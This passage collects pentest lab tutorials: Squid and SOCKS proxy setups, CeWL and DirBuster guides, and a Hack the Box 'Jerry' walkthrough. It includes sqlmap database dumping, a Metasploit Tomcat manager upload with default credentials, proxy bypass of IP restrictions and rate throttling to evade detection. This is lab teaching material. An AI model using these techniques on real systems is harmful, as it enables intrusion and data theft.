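    for conf_name, conf in (("lab", LAB_CONF), ("loose", LOOSE_CONF), ("tight", TIGHT_CONF)):
        for ip in ("192.168.1.50", "172.16.0.9"):
            print(conf_name, ip, decide(conf, ip))
```

With only the `http_access allow lan` line the default for everyone else is already deny, which is what this lab wants. The LOOSE_CONF case is the trap: a list whose last line is a deny silently allows every client it does not name, which is why Squid's own documentation recommends closing the list with `http_access deny all`.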



Configuring Apache service for Web Proxy
Now open the "000-default.conf" file from /etc/apache2/sites-available/ and add the following directives so that the /html directory (/var/www/html on Debian/Ubuntu) can only be reached from localhost or the machine's own IP (192.168.1.103). The rules use the Apache 2.2 style Order/deny/allow syntax; on Apache 2.4 the same rule is written "Require ip 127.0.0.1 192.168.1.103", and the 2.2 form only works there if mod_access_compat is loaded.
<Directory /var/www/html>
        Options Indexes FollowSymLinks MultiViews
        AllowOverride None
        Order deny,allow
        deny from all
        allow from 127.0.0.1 192.168.1.103
</Directory>

Save the file and restart the Apache service:
service apache2 restart


Now when someone tries to access the HTTP service on 192.168.1.103 directly, they are met with the following page:
"Error 403 Forbidden - You don't have permission to access".

When port 80 is open but every direct request gets a 403 like this, one explanation (and the one built into this lab) is that the web server only accepts requests arriving through the proxy; the checks with DIRB, Nikto and sqlmap below confirm it by retrying through port 3128. A 403 on its own is not proof: an access rule, a WAF or a missing index page can produce the same response.


Set-up Manual Proxy in the Browser

To test whether our proxy server is working, open Firefox and go to Edit → Preferences → Advanced → Network → Settings, select “Manual proxy configuration”, and enter the proxy server IP address (192.168.1.103) and port (3128) to be used for all protocols.


BOOMMM!! Connected through the Squid HTTP proxy successfully, and the browser now receives the page instead of the 403.
Directory Brute force Attack on Proxy Server Using DIRB Tool
When running a directory brute-force attack with DIRB we can use the -p option, which sends every request through the given proxy (if no port is given, DIRB assumes 1080). As you observed, opening the target IP in the browser produced an “Access forbidden” error, which means the web server only answers requests arriving from the proxy.
dirb http://192.168.1.103
dirb http://192.168.1.103 -p 192.168.1.103:3128
From the image below you can compare the output of the two commands: the first finds no directories or files, whereas the second, routed through the proxy, executes successfully.

Vulnerability Scanning on Proxy Server Using Nikto Tool
Similarly, when scanning a web server that is only reachable through a proxy, nikto's -useproxy option routes the vulnerability scan through it.
nikto -h 192.168.1.103
nikto -h 192.168.1.103 -useproxy http://192.168.1.103:3128
From the image below you can compare the two commands: the first obtains no result, whereas the second, routed through the proxy, executes successfully.

SQL Injection on Proxy Server Using Sqlmap Tool
As you observed, executing the following command produces a “403 forbidden” error, because the web server only accepts requests coming through the proxy.
sqlmap -u http://192.168.1.103/sqli/Less-1/?id=1 --dbs

Hence we use the --proxy option so that sqlmap connects to the target URL through the proxy:
sqlmap -u http://192.168.1.103/sqli/Less-1/?id=1 --dbs --proxy http://192.168.1.103:3128

In the image below you can observe that we successfully retrieved the database names by exploiting the SQL injection vulnerability through the proxy.

WordPress Scanning on Proxy Server Using WPScan Tool
As you observed, executing the following command produces a “403 forbidden” error, because the web server only accepts requests coming through the proxy.
wpscan --url http://192.168.1.103/wordpress --wp-content-dir wp-content
Hence we use the --proxy option so that WPScan connects to the target URL through the proxy:
wpscan --url http://192.168.1.103/wordpress --wp-content-dir wp-content  --proxy http://192.168.1.103:3128
Hopefully you have found this article helpful and now understand how a proxy server works and how the tools covered here can be pointed through one.

Socks Proxy Penetration Lab Setup using Microsocks

Hello friends!! In our previous article we discussed “Web Proxy Penetration Lab Setup Testing using Squid”; in today’s article we are going to set up a SOCKS proxy on an Ubuntu/Debian machine, use it as a proxy server, and try to penetrate the services behind it.
Table of Content
·         Introduction to proxy
·         What is socks proxy
·         Difference Between Socks proxy and HTTP Proxy
·         Socks proxy Installation
·         Web Proxy Penetration Testing
·         SSH Proxy Penetration Testing
·         FTP Proxy Penetration Testing
Introduction to Proxy
A proxy is a computer system or program that acts as an intermediary between your client (for example a web browser) and another computer. Your ISP operates servers, computers designed to deliver information to other computers, and uses proxy servers to speed up the transfer of information between those servers and your computer.
For example: two users, A and B, both request the same website. Instead of retrieving the data from the origin server a second time, the proxy serves the copy it has stored (cached) for the first request, without troubling the origin server.

What is SOCKS Proxy?
A SOCKS server is an all-purpose proxy server that creates a TCP connection to another server on the client’s behalf and then relays bytes between client and server without interpreting them. The Tor onion proxy software serves a SOCKS interface to its clients, and SSH dynamic port forwarding exposes one as well.
Prefer SOCKS5 where you can: it adds client authentication (username/password, GSSAPI), UDP relaying and IPv6 addressing, none of which SOCKS4 offers. Note that neither version encrypts the traffic it relays; authentication only controls who may use the proxy.
Difference Between Socks proxy and HTTP Proxy
§  SOCKS is a low-level, general-purpose proxy protocol: it relays raw connections, so it can carry any application protocol (HTTP, SSH, FTP and so on) without understanding it.
§  SOCKS5 proxies TCP connections and, through its UDP ASSOCIATE command, UDP traffic as well; SOCKS4 handles TCP only.
§  SOCKS operates at the session layer (Layer 5 of the OSI model).
§  A SOCKS server conventionally accepts client connections on TCP port 1080.
§  HTTP proxies proxy HTTP requests, while SOCKS proxies proxy socket connections.
§  An HTTP proxy is high-level and protocol-specific: it parses and forwards HTTP, and tunnels other TCP traffic only through the CONNECT method.
§  An HTTP proxy can only serve applications that speak HTTP to it, and works at the application layer (Layer 7).
§  An HTTP proxy conventionally listens on TCP port 3128 (Squid's default) or 8080.
Socks Proxy Installation
For the SOCKS proxy lab set-up we are going to download microsocks from GitHub. MicroSocks is a small, efficient, multithreaded SOCKS5 server; it is very light on resources, spawning one thread with an 8 KB stack per client.

Let’s start!!
Open the terminal with sudo rights and enter the following command:
git clone https://github.com/rofl0r/microsocks.git



Once the download completes, build and install it with the following commands:
cd microsocks
make
make install



Now execute the following command to run the SOCKS proxy on port 1080 without authentication. Anyone who can reach TCP 1080 on this host can then relay traffic through it, so keep the lab on an isolated network, or use microsocks' -u and -P options to require a username and password.
microsocks -p 1080


As you can observe, FTP, SSH, HTTP and the SOCKS service are all listening on our local machine. Now let’s test the SOCKS proxy against each protocol in turn to confirm that it really is the all-purpose relay described above.


Web Proxy Penetration Testing
Now configure the Apache service for the web proxy test: open the “000-default.conf” file from /etc/apache2/sites-available/ and add the following block so that the /html directory (the default DocumentRoot, assumed here to be /var/www/html) is served only to localhost and the machine IP (192.168.1.103). The enclosing Directory block is added here for completeness; the original listed only the directives inside it:
<Directory /var/www/html>
                Options Indexes FollowSymLinks MultiViews
                AllowOverride None
                Order deny,allow
                deny from all
                allow from 127.0.0.1 192.168.1.103
</Directory>
Now save the file and restart the Apache service so the new rules take effect:
service apache2 restart

Now when someone tries to access the web service of our machine (192.168.1.103) directly, he/she will be welcomed by the following page:
“Error 403 Forbidden - You don’t have permission to access”.
When you face a situation where port 80 is open but every request is refused like this, the server is filtering by source address; a proxy running on a permitted host (here microsocks on the web server itself) is one way through, which is what we test next.



For web proxy penetration testing we had already set up a lab web application such as DVWA (read the article here).
To test whether the proxy server is working, open Firefox and go to Edit → Preferences → Advanced → Network → Settings, select “Manual proxy configuration”, and enter the SOCKS proxy server IP address (192.168.1.103) and port (1080) in the SOCKS Host fields, selecting SOCKS v5; microsocks only speaks SOCKS, so leave the HTTP proxy fields empty.


BOOMMM!! Connected successfully through the SOCKS proxy in our browser, and the page loads instead of the 403.


SSH Proxy Penetration Testing

Now configure /etc/hosts.allow (TCP wrappers) so that sshd accepts connections only from localhost and the machine IP and refuses everything else. Add the following lines:
sshd : localhost : allow
sshd : 192.168.1.103 : allow
sshd : ALL : deny
This only takes effect where sshd is built with TCP wrappers support (older Debian/Ubuntu builds); where it is not, sshd's own AllowUsers user@host patterns or a firewall rule give the same effect.



Now open the proxychains configuration file, /etc/proxychains.conf, on your Kali Linux machine and add the following line at the bottom, under [ProxyList]:
socks5 192.168.1.103 1080

Now when we try to connect to the target machine on port 22 for an SSH connection, we get the error “Connection reset by peer”, as shown in the image below after executing the first command.
ssh pentest@192.168.1.103
Port 22 is open yet refuses us: access is being restricted by source address, and a proxy on a permitted host is one way through.
If you prefix the command with proxychains after saving the configuration above, the TCP connection is made by microsocks on 192.168.1.103 itself, which hosts.allow permits, and the SSH login succeeds as shown after the second command.
proxychains ssh pentest@192.168.1.103
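To make the SOCKS5 description above and the proxychains step concrete, here is an added example (not part of the article and not microsocks' code): a minimal SOCKS5 client and server, limited to the no-authentication method and CONNECT to an IPv4 address, run entirely on loopback. The "target" service is a constructed stand-in for sshd or vsftpd that echoes one message; the client can reach it only via the proxy, which is exactly what proxychains does for ssh and what FileZilla's generic proxy does for FTP below. The sample message and the use of ephemeral loopback ports are assumptions of this demo.

```python
# Added example (not from the article, not microsocks code): a minimal SOCKS5 (RFC 1928)
# client and server supporting the no-authentication method and CONNECT to an IPv4 address.
# demo() runs the whole exchange on loopback: a throwaway "target" service that echoes one
# message, a SOCKS5 proxy in front of it, and a client that reaches the target only through
# the proxy. Sample message and ephemeral loopback addresses are constructed for the demo.
import socket
import struct
import threading

VER, NO_AUTH, CMD_CONNECT, ATYP_IPV4 = 0x05, 0x00, 0x01, 0x01
# microsocks started with -u/-P would expect method 0x02 (username/password, RFC 1929) instead

def _recv_exact(sock, n):
    """SOCKS fields are fixed-size, so short reads must be handled."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed during SOCKS exchange")
        buf += chunk
    return buf

def build_greeting(methods=(NO_AUTH,)):
    """Client greeting: VER | NMETHODS | METHODS."""
    return bytes([VER, len(methods), *methods])

def build_connect(host, port):
    """CONNECT request: VER | CMD | RSV | ATYP | DST.ADDR (4 bytes) | DST.PORT (big-endian)."""
    return bytes([VER, CMD_CONNECT, 0x00, ATYP_IPV4]) + socket.inet_aton(host) + struct.pack("!H", port)

def socks5_connect(sock, host, port):
    """Client side on an open socket to the proxy; True when the proxy reports success."""
    sock.sendall(build_greeting())
    ver, method = _recv_exact(sock, 2)
    if ver != VER or method != NO_AUTH:            # 0xFF = no acceptable method
        return False
    sock.sendall(build_connect(host, port))
    reply = _recv_exact(sock, 10)                   # VER | REP | RSV | ATYP | BND.ADDR | BND.PORT
    return reply[1] == 0x00                         # REP 0x00 = succeeded

def _pipe(src, dst):
    """Relay one direction until EOF, then tear down both sockets."""
    try:
        while chunk := src.recv(4096):
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        for s in (src, dst):
            try:
                s.shutdown(socket.SHUT_RDWR)
            except OSError:
                pass

def serve_socks5_once(client):
    """Server side for one client: negotiate, parse CONNECT, dial the target, relay."""
    ver, nmethods = _recv_exact(client, 2)
    if ver != VER or NO_AUTH not in _recv_exact(client, nmethods):
        client.sendall(bytes([VER, 0xFF]))
        return client.close()
    client.sendall(bytes([VER, NO_AUTH]))
    _ver, cmd, _rsv, atyp = _recv_exact(client, 4)
    if cmd != CMD_CONNECT or atyp != ATYP_IPV4:
        client.sendall(bytes([VER, 0x07, 0x00, ATYP_IPV4]) + bytes(6))   # 0x07 = command not supported
        return client.close()
    host = socket.inet_ntoa(_recv_exact(client, 4))
    port = struct.unpack("!H", _recv_exact(client, 2))[0]
    upstream = socket.create_connection((host, port))    # the proxy, not the client, reaches the target
    client.sendall(bytes([VER, 0x00, 0x00, ATYP_IPV4]) + bytes(6))
    threading.Thread(target=_pipe, args=(client, upstream), daemon=True).start()
    threading.Thread(target=_pipe, args=(upstream, client), daemon=True).start()

def _listen():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))     # loopback, ephemeral port
    s.listen(1)
    return s

def _echo_once(listener):
    """Stand-in for the protected service (sshd, vsftpd): answer one message and hang up."""
    conn, _ = listener.accept()
    with conn, listener:
        conn.sendall(b"echo:" + conn.recv(4096))

def _proxy_once(listener):
    client, _ = listener.accept()
    listener.close()
    serve_socks5_once(client)

def demo(message=b"SSH-2.0-probe\r\n"):
    """Reach the loopback target only via the loopback SOCKS5 proxy; return the target's reply."""
    target, proxy = _listen(), _listen()
    threading.Thread(target=_echo_once, args=(target,), daemon=True).start()
    threading.Thread(target=_proxy_once, args=(proxy,), daemon=True).start()
    host, port = target.getsockname()
    with socket.create_connection(proxy.getsockname()) as s:
        if not socks5_connect(s, host, port):
            raise ConnectionError("SOCKS5 negotiation failed")
        s.sendall(message)
        return _recv_exact(s, len(b"echo:") + len(message))

if __name__ == "__main__":
    print(demo())
```

The point to notice is in serve_socks5_once: the outbound connection to the target is opened by the proxy process, so a hosts.allow or firewall rule keyed on source address sees the proxy's IP, not the client's. That is why the ssh and FTP tests below succeed only when routed through 192.168.1.103:1080.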

FTP Proxy Penetration Testing
Now configure the FTP access restriction. The following lines are added to /etc/vsftpd.conf to allow FTP from localhost and the machine IP only:

Order Allow, Deny
Allow from 127.0.0.1 192.168.1.103
Deny from all
Note that this is Apache access-control syntax and vsftpd does not parse it; vsftpd is usually restricted by setting tcp_wrappers=YES in vsftpd.conf and adding vsftpd entries to /etc/hosts.allow in the same form as the sshd lines above.


Using FileZilla, when we try to connect to 192.168.1.103 on port 21 to access the FTP service, we get the error “Connection closed by server”.
Port 21 is open yet closes on us: as with SSH, the service is filtering by source address, and a proxy on the permitted host is a way through.



FileZilla can route its FTP connections through a generic SOCKS proxy (this forces passive mode, since a proxy cannot accept the inbound data connections of active mode). Go to Settings > Connection > FTP, select the generic proxy option, and configure the following:
§  Choose SOCKS 5 as generic Proxy
§  Proxy HOST IP: 192.168.1.103
§  Proxy Port: 1080

 

Now when you try again to connect to the target machine on port 21, the FTP service is reachable, as shown in the last image.
Hence SOCKS really is an all-purpose proxy: the same relay carried HTTP, SSH and FTP without any protocol-specific configuration. Hopefully you have found this article helpful and now understand how a proxy server works and the related topics covered here.


Comprehensive Guide on Cewl Tool


Hello friends!! In this article we focus on generating wordlists with the Kali Linux tool CeWL and learn about its available options.

Table of Content
§  Introduction to Cewl
§  Default Method
§  Save Wordlist in a file
§  Generating Wordlist of Specific Length
§  Retrieving Emails from a Website
§  Count the number of Word Repeated in a website
§  Increase the Depth to Spider
§  Extra Debug Information
§  Verbose Mode
§  Generating Alpha-Numeric
§  Cewl with Digest/Basic Authentication
§  Proxy URL

Introduction to Cewl

CeWL is a Ruby app which spiders a given URL to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper. CeWL also has an associated command line app, FAB (Files Already Bagged), which uses the same metadata extraction techniques to create author/creator lists from already downloaded.


Type cewl -h in the terminal; it prints all the options it accepts along with their descriptions.
SYNTAX: cewl [options] URL


General Options
                -h, --help:                   Show help.
                -k, --keep:                   Keep the downloaded file.
                -d <x>, --depth <x>:          Depth to spider to, default 2.
                -m, --min_word_length:        Minimum word length, default 3.
                -o, --offsite:                Let the spider visit other sites.
                -w, --write:                  Write the output to the file.
                -u <agent>, --ua <agent>:     User agent to send.
                -n, --no-words:               Don't output the wordlist.
                --with-numbers:               Accept words with numbers in as well as just letters.
                -a, --meta:                   Include meta data.
                --meta_file file:             Output file for meta data.
                -e, --email:                  Include email addresses.
                --email_file <file>:          Output file for email addresses.
                --meta-temp-dir <dir>:        The temporary directory used by exiftool when parsing files, default /tmp.
                -c, --count:                  Show the count for each word found.
                -v, --verbose:                Verbose.
                --debug:                      Extra debug information.

                Authentication
                --auth_type:                  Digest or basic.
                --auth_user:                  Authentication username.
                --auth_pass:                  Authentication password.

                Proxy Support
                --proxy_host:                 Proxy host.
                --proxy_port:                 Proxy port, default 8080.
                --proxy_username:             Username for proxy, if required.
                --proxy_password:             Password for proxy, if required.



Default Method

The following command spiders the given URL to the default depth and prints a list of words that can be used as a dictionary for password cracking:
cewl http://www.ignitetechnologies.in/


Save Wordlist in a file

For record keeping, readability and future reference we save the printed word list to a file; the -w parameter writes the output to the given text file.

cewl http://www.ignitetechnologies.in/ -w dict.txt

Having run the command, check that the output was actually saved; in this case the output file is /root/dict.txt.
cat dict.txt




Generating Wordlist of Specific Length

To keep only words of at least a given length, use the -m option, which sets the minimum word length:

cewl http://www.ignitetechnologies.in/ -m 9

The command above lists only words of 9 characters or more; as you can observe in the following image, it crawled the website and printed just those words.

Retrieving Emails from a Website

Use the -e option to collect e-mail addresses, combined with -n to suppress the word list itself:

cewl http://www.ignitetechnologies.in/ -n -e

As shown in the image below, it found 1 e-mail address on the website.



Count the number of Word Repeated in a website

To see how many times each word occurs on the website, use the -c (count) option:
cewl http://www.ignitetechnologies.in/ -c
As you can observe in the image below, it printed the count next to each word found on the website.



Increase the Depth to Spider
To crawl deeper and harvest more words, use the -d option with the depth level; the default is 2. A deeper crawl takes longer and sends far more requests to the target, so raise it deliberately.

cewl http://www.ignitetechnologies.in/ -d 3

Extra Debug Information

Use the --debug option to enable debug mode, which shows errors and the raw detail of each page fetched while crawling:

cewl http://www.ignitetechnologies.in/ --debug

Verbose Mode

Use the -v option for verbose mode: besides the word list, CeWL reports what it is fetching and parsing, which helps when a crawl returns less than expected.

cewl http://www.ignitetechnologies.in/ -v


Generating Alpha-Numeric

If you want to generate an alpha-numeric wordlist, add the --with-numbers option; by default CeWL keeps letters-only words.
cewl http://testphp.vulnweb.com/ --with-numbers


From the image below you can observe that this time it generated an alpha-numeric wordlist.



Cewl with Digest/Basic Authentication

If the site is protected by HTTP authentication (Basic or Digest), the default command cannot fetch its pages. Supply the credentials with the following parameters. Note that these handle HTTP authentication only; a form-based login such as DVWA’s login.php is served as an ordinary public page, so CeWL spiders the form itself rather than the pages behind it.
--auth_type:                      Digest or basic.
--auth_user:                      Authentication username.
--auth_pass:                      Authentication password.

cewl http://192.168.1.105/dvwa/login.php --auth_type Digest --auth_user admin --auth_pass password -v
or
cewl http://192.168.1.105/dvwa/login.php --auth_type basic --auth_user admin --auth_pass password -v

From the image below you can observe that it received an HTTP 200 response and generated the wordlist.



Proxy URL

When the website is reachable only through a proxy server, the default command cannot generate a wordlist, as shown in the image below.

cewl -w dict.txt http://192.168.1.103/wordpress/
Use the --proxy_host and --proxy_port options to send the requests through the proxy:
cewl --proxy_host 192.168.1.103 --proxy_port 3128 -w dict.txt http://192.168.1.103/wordpress/
As you can observe in the image below, the second command printed the list of words successfully.
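To show what the options covered above actually do, here is an added example (not CeWL's own code): a small in-memory spider over a constructed site map, so it runs without a network. SITE is a made-up dict of path to HTML; spider() follows on-site links to a depth like -d, wordlist() extracts words of a minimum length like -m, with or without digits like --with-numbers, and counts them like -c, and emails() harvests addresses like -e. All page content, names and addresses are invented for the demo.

```python
# Added example (not CeWL's code): a small in-memory spider that reproduces what CeWL's main
# options do, so the behaviour can be seen without a network. SITE is a constructed site map of
# path -> HTML; spider() follows on-site links to a depth (-d), wordlist() extracts words of a
# minimum length (-m) with or without digits (--with-numbers) and counts them (-c), and
# emails() harvests addresses (-e). All page content, names and addresses are made up.
import re
from collections import Counter
from html.parser import HTMLParser

SITE = {
    "/": "<html><head><title>Ignite Technologies</title></head><body>"
         "<p>Welcome to Ignite Technologies, training in penetration testing since 2014.</p>"
         '<a href="/team">Team</a> <a href="/contact">Contact</a>'
         "<script>var tracker = 1;</script></body></html>",
    "/team": "<html><body><h1>Team</h1><p>Our trainers Raj and Aarti run the Kali labs.</p>"
             '<a href="/labs">labs</a> <a href="http://other.example/">partner</a></body></html>',
    "/contact": "<html><body><p>Write to info@ignitetechnologies.in or hr@ignitetechnologies.in</p></body></html>",
    "/labs": "<html><body><p>Lab password hints: lab2019, IgniteLab, kali2019</p></body></html>",
}


class _TextAndLinks(HTMLParser):
    """Collect visible text and href targets, skipping script and style bodies."""

    def __init__(self):
        super().__init__()
        self.text, self.links, self._skip = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip = True
        elif tag == "a":
            self.links.extend(v for k, v in attrs if k == "href" and v)

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self._skip = False

    def handle_data(self, data):
        if not self._skip:
            self.text.append(data)


def spider(site, start="/", depth=2):
    """Breadth-first crawl up to `depth` link hops from `start` (CeWL -d, default 2).

    Links that are not on this site are ignored, as CeWL does unless -o is given.
    Returns the visible text of each visited page in crawl order.
    """
    seen, frontier, texts = {start}, [start], []
    for _ in range(depth + 1):
        next_frontier = []
        for path in frontier:
            page = _TextAndLinks()
            page.feed(site[path])
            texts.append(" ".join(page.text))
            for link in page.links:
                if link in site and link not in seen:
                    seen.add(link)
                    next_frontier.append(link)
        frontier = next_frontier
    return texts


def wordlist(texts, min_len=3, with_numbers=False):
    """CeWL's word extraction: letters only unless --with-numbers; drop words shorter than -m."""
    pattern = r"[A-Za-z0-9]+" if with_numbers else r"[A-Za-z]+"
    counts = Counter()
    for text in texts:
        counts.update(w for w in re.findall(pattern, text) if len(w) >= min_len)
    return counts            # keys are the wordlist; most_common() gives CeWL's -c view


EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")


def emails(texts):
    """CeWL -e: unique e-mail addresses in the order they were seen."""
    return list(dict.fromkeys(addr for text in texts for addr in EMAIL_RE.findall(text)))


if __name__ == "__main__":
    pages = spider(SITE)
    for word, n in wordlist(pages).most_common(5):
        print(n, word)
    print(wordlist(pages, with_numbers=True).keys() - wordlist(pages).keys())
    print(emails(pages))
```

Two details worth carrying over to real runs: the depth setting decides whether the /labs page (two hops from the start) is reached at all, and the letters-only default silently discards candidates like lab2019 that are exactly the sort of password a site leaks, which is why --with-numbers matters for password lists.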

Hack the Box: Jerry Walkthrough


Hello CTF crackers!! Today we are going to capture the flag on a challenge named “Jerry”, which is available online for those who want to increase their skill in penetration testing and black-box testing. Jerry is a retired vulnerable lab presented by Hack the Box, which offers a collection of vulnerable labs as challenges from beginner to expert level.
Level: Easy
Flags: There are two flags. (user.txt & root.txt)
IP Address: 10.10.10.95
Methodology:
§  Port scanning and IP discovery
§  Browsing the IP on port 8080
§  Enumerating served webpage
§  Getting Login Credentials
§  Attacking using Metasploit
§  Getting root Access
§  Reading the flags
Walkthrough
Since these labs are available online via VPN, they have a static IP. The IP of Jerry is 10.10.10.95.
Let’s start off with scanning the network to find our target
nmap -sV 10.10.10.95


Here we notice a very interesting result in the nmap scan: port 8080 is open and serves Apache Tomcat/Coyote JSP Engine 1.1.
Next order of business is to browse the IP on a Web Browser.


On opening the IP in the web browser we are greeted with the default Tomcat page. After some enumeration we found the “Manager App” link; clicking it presents a login prompt, as shown below.


After some tweaking with passwords and other guesses, we found that clicking the “Cancel” button triggers a 401 error page.


Reading the example tomcat-users.xml snippet shown on that 401 page closely gives us the logon credentials, which turn out to be in use on this box:
User: tomcat
Password: s3cret
It’s time to attack using the Swiss army knife of any penetration tester, Metasploit.
After some research and a few tries, it was clear that we can use the tomcat_mgr_upload exploit, which uses the manager credentials to deploy a malicious WAR file through the manager application.
So, let’s do this:
msf> use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost 10.10.10.95
msf exploit(multi/http/tomcat_mgr_upload) > set rport 8080
msf exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat
msf exploit(multi/http/tomcat_mgr_upload) > set HttpPassword s3cret
msf exploit(multi/http/tomcat_mgr_upload) > exploit
As shown in the screenshot below, the exploit runs successfully and gives a meterpreter session with elevated privileges.
We traverse the directories to find the flags using commands like “ls” and “cd”.


After a little enumeration we reach the C:\Users directory. Here we come across the Administrator user directory, so we move into it and then into its Desktop directory.
This contains a flags directory holding a text file named “2 for the price of 1”. Opening it gives us both the user and root flags.



Comprehensive Guide on Dirbuster Tool


In this article we focus on finding hidden files and directories on a web server with the Kali Linux tool DirBuster.

Table of Content
·         What is DirBuster
·         Default Mode
·         GET Request Method
·         Pure Brute Force (Numeric)
·         Single Sweep (Non-recursive)
·         Targeted Start
·         Blank Extensions
·         Search by File Type (.txt)
·         Changing DIR List
·         Following Redirects
·         Attack Through Proxy
·         Adding File Extensions
·         Evading Detective Measures (Requests Per Second)


What is DirBuster
DirBuster is an application in the Kali arsenal designed to brute force directory and file names on web and application servers. It lets users take advantage of multi-threading to get things moving faster. In this article we will give you an overview of the tool and its basic functions.

Default Mode
We start DirBuster and only input http://testphp.vulnweb.com/ in the target URL field, leaving the rest of the options as they are. DirBuster will now auto-switch between HEAD and GET requests to perform a list-based brute force attack.




Let’s hit Start. DirBuster gets to work and starts brute forcing and we see various files and directories popping up in the result window.




GET Request Method
We will now set DirBuster to use only the GET request method. To make things go a little faster, the thread count is set to 200 and the “Go Faster” check box is checked; note that a high thread count is also the easiest way to get noticed or to knock over a fragile target.



In the Results - Tree View we can see findings.


Pure Brute Force (Numeric)
DirBuster allows a lot of control over the attack process; in this step we use only numerals to perform a pure brute force attack. This is done by selecting “Pure Brute Force” in the scanning type option and selecting “0-9” in the char set drop-down menu. The minimum and maximum character limits are left at their defaults.


In the Results - Tree View we can see findings.


Single Sweep (Non-recursive)
We will now perform a single sweep brute force where the dictionary words are used only once. To achieve this, we will unselect the “Be Recursive” checkbox.


In the Results - List View we can see findings.


Targeted Start
Further exploring the control options provided by DirBuster, we will set it up to start looking from the “admin” directory. In the “Dir to start with” field, type “/admin” and hit start.


In the Results - Tree View we can see findings.



Blank Extensions
DirBuster can also look for directories with a blank extension, which could uncover data that would otherwise be left untouched. All we do is check the “Use Blank Extension” checkbox.



We can see the processing happen and DirBuster testing to find directories with blank extensions.



Search by File Type (.txt)
We will be setting the file extension type to .txt, by doing so, DirBuster will look specifically for files with a .txt extension. Type “.txt” in the File extension field and hit start.


We can see the processing happen and DirBuster testing to find directories with a .txt extension.


Changing DIR List
We will now change the directory list in DirBuster: Options > Advanced Options > DirBuster Options > Dir list to use. Here we can browse and change the list to “directory-list-2.3-medium.txt”, found at /usr/share/dirbuster/wordlists/ in Kali.



We can see the word list is now set.



Following Redirects
DirBuster by default is not set to follow redirects during the attack, but we can enable this option under Options > Follow Redirects.



We can see the results in the scan information as the test progresses.



Results in the Tree View.


Attack through Proxy
DirBuster can also attack using a proxy. In this scenario we try to open a webpage at 192.168.1.108 but are denied access.


We set the IP in DirBuster as the attack target.




Before we start the attack, we setup the proxy option under Options > Advance Options > Http Options. Here we check the “Run through a proxy” checkbox, input the IP 192.168.1.108 in the Host field and set the port to 3129.




We can see the test showing results.



Adding File Extensions
Some file extensions, mostly image formats, are excluded from DirBuster's HTML parsing by default, so links to such files are not followed. The exclusion list is under Options > Advanced Options > HTML Parsing Options.



We remove jpeg from that exclusion list in this instance and click OK.




In the File Extension filed we will type in “jpeg” to explicitly tell DirBuster to look for .jpeg format files.




We can see in the testing process, DirBuster is looking for and finding jpeg files.




Evading Detective Measures
Exceeding a reasonable number of requests per second during an attack is a sure way to get flagged by whatever detective measures are in place (rate limits, a WAF, log monitoring). DirBuster lets us throttle the requests per second to stay under such thresholds; Options > Advanced Options > Scan Options is where we enable this setting.





We are setting Connection Time Out to 500, checking the Limit number of requests per second and setting that field to 20.




Once the test is initiated, we will see results. The scan was stopped to show the initial findings.



Once the scan is complete the actual findings can be seen.
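As an added example (not part of the article or of DirBuster) showing the other side of that last section, the following Python implements the kind of detective measure the throttle is meant to stay under: it parses Apache combined-format access-log lines and flags any source that exceeds a requests-per-second budget or whose responses are mostly 404s, the signature of a wordlist scan. The log lines, addresses and thresholds are constructed for the demo.

```python
# Added example (not part of the article or of DirBuster): the "detective measure" side of the
# last section. It parses Apache combined-format access-log lines, then flags any source that
# exceeds a requests-per-second budget or whose responses are mostly 404s, the signature of a
# wordlist scan. The log lines, addresses and thresholds below are constructed for the demo.
import re
from collections import defaultdict, deque
from datetime import datetime

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"   # Apache's default timestamp, one-second resolution


def parse_line(line):
    """Return a dict for a combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FORMAT)
    rec["status"] = int(rec["status"])
    return rec


def detect_scanners(lines, max_rps=20, min_requests=10, max_404_ratio=0.8):
    """Return {ip: [reasons]} for sources that look like directory brute-forcers.

    max_rps        more requests than this inside one clock second trips the rate rule
    min_requests   ignore the 404 ratio for sources with fewer requests (one typo is not a scan)
    max_404_ratio  share of 404 responses at which a source is reported
    """
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            per_ip[rec["ip"]].append(rec)
    findings = {}
    for ip, recs in per_ip.items():
        recs.sort(key=lambda r: r["ts"])
        reasons = []
        window, peak = deque(), 0
        for r in recs:                       # sliding one-second window over sorted timestamps
            window.append(r["ts"])
            while (r["ts"] - window[0]).total_seconds() >= 1:
                window.popleft()
            peak = max(peak, len(window))
        if peak > max_rps:
            reasons.append(f"{peak} requests in one second (limit {max_rps})")
        if len(recs) >= min_requests:
            ratio = sum(r["status"] == 404 for r in recs) / len(recs)
            if ratio >= max_404_ratio:
                reasons.append(f"{ratio:.0%} of {len(recs)} responses were 404")
        if reasons:
            findings[ip] = reasons
    return findings


def _line(ip, second, path, status):
    return (f'{ip} - - [10/Sep/2019:10:15:{second:02d} +0530] "GET {path} HTTP/1.1" {status} 217 '
            f'"-" "Mozilla/5.0 (constructed)"')


# Constructed log: a normal visitor, a fast scanner, and a throttled scanner (10 req/s, mostly 404)
SAMPLE_LOG = (
    [_line("192.168.1.20", 1, p, 200) for p in ("/", "/index.php", "/about", "/css/site.css", "/contact")]
    + [_line("192.168.1.50", 3, f"/dir{i}", 404) for i in range(25)]
    + [_line("192.168.1.60", 5 + i // 10, f"/w{i}", 200 if i % 10 == 0 else 404) for i in range(30)]
)

if __name__ == "__main__":
    for ip, reasons in detect_scanners(SAMPLE_LOG).items():
        print(ip, "->", "; ".join(reasons))
```

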